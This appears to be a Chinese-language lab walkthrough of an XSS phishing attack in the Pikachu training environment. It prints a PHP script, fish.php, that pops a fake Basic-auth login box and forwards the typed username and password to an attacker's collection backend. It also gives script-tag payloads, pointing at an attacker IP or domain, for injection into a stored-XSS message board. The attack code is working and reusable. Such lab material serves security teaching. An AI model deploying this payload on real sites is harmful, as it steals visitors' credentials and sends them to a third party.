xss钓鱼演示
钓鱼攻击利用页面 D:\phpStudy\WWW\pikachu\pkxss\xfish
修改配置文件里面对应自己的入侵者的IP地址或者域名,对应的路径下的fish.php脚本如下:
<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
header('Content-type:text/html;charset=utf-8');
header("WWW-Authenticate: Basic realm='认证'");
header('HTTP/1.0 401 Unauthorized');
echo 'Authorization Required.';
exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
// header("Location: http://192.168.1.15/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
header("Location: http://www.pikachu.net/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
&password={$_SERVER[PHP_AUTH_PW]}");
}
?>
代码意思:就是将用户输入的账号信息发送到攻击者的平台上。
输入入侵者的IP地址
<script src="http://192.168.0.101/pikachu/pkxss/xfish/fish.php"></script>
基于我的环境如下
<script src='http://www.pikachu.net/pkxss/xfish/fish.php'></script>
在存在存储型xss漏洞的网页上,输入以上代码,永久性存储在网页前端,如果用户警惕不是很高,就会中招
将上面的script攻击代码输入到留言板里面进行提交,就会出现弹窗进行输入账号和密码,每次刷新都会弹窗
现在攻击者平台没有任何信息
当用户输入账号和密码,确定以后就会直接提交到攻击的平台上